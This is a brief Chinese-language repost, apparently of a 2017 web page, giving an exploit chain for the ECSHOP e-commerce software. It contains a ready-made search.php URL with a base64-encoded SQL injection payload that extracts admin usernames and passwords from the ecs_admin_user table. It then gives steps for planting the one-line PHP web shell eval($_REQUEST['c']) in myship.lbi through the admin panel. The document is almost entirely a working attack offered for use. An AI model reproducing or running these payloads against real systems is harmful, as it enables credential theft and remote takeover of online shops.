作者:董福强 | 来源:互联网 | 2017-11-11 21:32
ECSHOP搜索型注入exp及后台拿SHELL漏洞这个是search.phpexp变种search.php?encodeYToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3Jk
ECSHOP 搜索型注入exp及后台拿SHELL漏洞
这个是search.php exp 变种
search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 |
拿SHELL登陆后台/admin/ 输入用户密码模块管理-库项目管理-选择myship.lbi里插入eval($_REQUEST['c'])?>
连接http://127.0.0.1/myship.php一句话